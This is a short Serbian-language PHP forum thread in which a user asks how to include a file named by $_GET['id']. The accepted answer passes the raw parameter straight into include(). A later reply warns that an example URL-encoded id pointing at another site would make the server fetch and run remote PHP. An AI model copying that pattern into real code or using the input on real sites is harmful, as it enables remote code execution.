[ aurelio2 @ 24.03.2012. 12:42 ] @
Jedno jednostavno pitanje za one koji se malo razume u PHP:



Kako u funkciju include staviti $_GET?



Na primjer imamo:

<?php include("1.php"); ?>

Ja bih želio da umjesto ovog "1" bude:

<?php echo ($_GET["id"]); ?>

To jest ovako nekako, ali moliću, pravilno:

<?php

include("<?php echo ($_GET['id']); ?>.php");

?>
[ PHPovac @ 24.03.2012. 12:53 ] @
Code (php):

<?php

include($_GET['id'].".php");

?>
 
[ aurelio2 @ 24.03.2012. 14:48 ] @
TO je to!!

Hvala!
[ Nemanja Avramović @ 25.03.2012. 19:26 ] @
Obrati samo pažnju da na nekim serverima, maliciozni korisnik može da pozove stranica.php?id=http%3a%2f%2fdrugisajt.com%2ffajl

Tvoja PHP skripta će inkludovati http://drugisajt.com/fajl.php, a ako taj fajl ispisuje PHP kod, taj kod će biti izvršen na tvom serveru!